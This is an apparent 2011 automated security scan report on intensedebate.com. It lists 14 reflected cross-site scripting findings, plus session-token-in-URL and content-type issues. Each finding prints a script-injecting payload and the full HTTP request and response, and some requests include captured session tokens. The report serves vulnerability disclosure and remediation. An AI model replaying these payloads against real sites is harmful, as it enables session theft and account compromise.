XSS, intensedebate.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Mar 13 07:33:35 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

1.1. http://intensedebate.com/comment/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072 [REST URL parameter 1]

1.2. http://intensedebate.com/empty.php [REST URL parameter 1]

1.3. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]

1.4. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]

1.5. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]

1.6. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]

1.7. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]

1.8. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]

1.9. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]

1.10. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]

1.11. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]

1.12. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]

1.13. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]

1.14. http://intensedebate.com/remoteCheckin.php [REST URL parameter 1]

2. Session token in URL

2.1. http://intensedebate.com/idc/js/comment-func.php

2.2. http://intensedebate.com/remoteCheckin.php

3. Email addresses disclosed

4. Content type incorrectly stated

4.1. http://intensedebate.com/js/genericCommentWrapper2.php

4.2. http://intensedebate.com/js/getUserMenu.php

4.3. http://intensedebate.com/remoteCheckin.php



1. Cross-site scripting (reflected)  next
There are 14 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://intensedebate.com/comment/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /comment/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9fe6'><script>alert(1)</script>80ef55e3cd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commentc9fe6'><script>alert(1)</script>80ef55e3cd1/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:50:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4751

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/commentc9fe6'><script>alert(1)</script>80ef55e3cd1/c50f2a764aa1b8f5871c7859edc4846b/generic/79084072'>
...[SNIP]...

1.2. http://intensedebate.com/empty.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17366'><script>alert(1)</script>36a23d3f268 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php17366'><script>alert(1)</script>36a23d3f268 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php17366'><script>alert(1)</script>36a23d3f268'>
...[SNIP]...

1.3. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fdb1c'><script>alert(1)</script>194248fb77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php/fdb1c'><script>alert(1)</script>194248fb77 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/fdb1c'><script>alert(1)</script>194248fb77'>
...[SNIP]...

1.4. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c856b'><script>alert(1)</script>2ea776fb444 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.phpc856b'><script>alert(1)</script>2ea776fb444 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4809

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.phpc856b'><script>alert(1)</script>2ea776fb444'>
...[SNIP]...

1.5. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 407d5'><script>alert(1)</script>fbd8fcc8fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.php/407d5'><script>alert(1)</script>fbd8fcc8fab HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4806

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php/407d5'><script>alert(1)</script>fbd8fcc8fab'>
...[SNIP]...

1.6. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8673b'><script>alert(1)</script>d6a0db58790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.php8673b'><script>alert(1)</script>d6a0db58790 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4800

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.php8673b'><script>alert(1)</script>d6a0db58790'>
...[SNIP]...

1.7. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2a564'><script>alert(1)</script>67b210f1d5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.php/2a564'><script>alert(1)</script>67b210f1d5c HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4804

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.php/2a564'><script>alert(1)</script>67b210f1d5c'>
...[SNIP]...

1.8. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5da3'><script>alert(1)</script>2bf052a75ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.phpb5da3'><script>alert(1)</script>2bf052a75ab?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570923 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4795

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.phpb5da3'><script>alert(1)</script>2bf052a75ab?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570923'>
...[SNIP]...

1.9. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4f62'><script>alert(1)</script>f7c1e608d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php/b4f62'><script>alert(1)</script>f7c1e608d67 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:55 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4804

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php/b4f62'><script>alert(1)</script>f7c1e608d67'>
...[SNIP]...

1.10. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 294ad'><script>alert(1)</script>3143ed93c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.php294ad'><script>alert(1)</script>3143ed93c46?acct=c50f2a764aa1b8f5871c7859edc4846b&postid=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injection-cheatsheet-oku%2F&title=SQL%20Injection%20Cheat%20Sheet&url=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injection-cheatsheet-oku%2F HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4942

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.php294ad'><script>alert(1)</script>3143ed93c46?acct=c50f2a764aa1b8f5871c7859edc4846b&postid=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injection-cheatsheet-oku%2F&title=SQL%20Injection%20Cheat%20Sheet&url=http%3A%2F%2Fferruh.mavituna.com%2Fsql-injecti
...[SNIP]...

1.11. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7513e'><script>alert(1)</script>c6be22f6ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.php/7513e'><script>alert(1)</script>c6be22f6ccb HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4810

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.php/7513e'><script>alert(1)</script>c6be22f6ccb'>
...[SNIP]...

1.12. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c5e4'><script>alert(1)</script>4fe7c999fe4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php4c5e4'><script>alert(1)</script>4fe7c999fe4 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4804

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php4c5e4'><script>alert(1)</script>4fe7c999fe4'>
...[SNIP]...

1.13. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getUserMenu.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9eec4'><script>alert(1)</script>9234ba22fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getUserMenu.php/9eec4'><script>alert(1)</script>9234ba22fd HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Mar 2011 02:49:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4799

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getUserMenu.php/9eec4'><script>alert(1)</script>9234ba22fd'>
...[SNIP]...

1.14. http://intensedebate.com/remoteCheckin.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteCheckin.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cbc7'><script>alert(1)</script>8da99e0bc4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteCheckin.php9cbc7'><script>alert(1)</script>8da99e0bc4d?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570781 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4789

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteCheckin.php9cbc7'><script>alert(1)</script>8da99e0bc4d?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570781'>
...[SNIP]...

2. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://intensedebate.com/idc/js/comment-func.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /idc/js/comment-func.php?token=ASZHjNt0hU7QWMP9YZnXXhh8ERg1TTlt&blogpostid=79084072&time=1299953570923 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 12 Mar 2011 18:12:17 GMT
Content-Type: text/javascript;charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 285

IDC.load_js( 'http://wordpress.com/remote-login.php?action=script_redirect&url_hash=6398700a9eed16225f9ab17f0548597f&id=intensedebate&url=http%3A%2F%2Fintensedebate.com%2Fidc%2Fjs%2Fcomment-func.php%3
...[SNIP]...

2.2. http://intensedebate.com/remoteCheckin.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /remoteCheckin.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

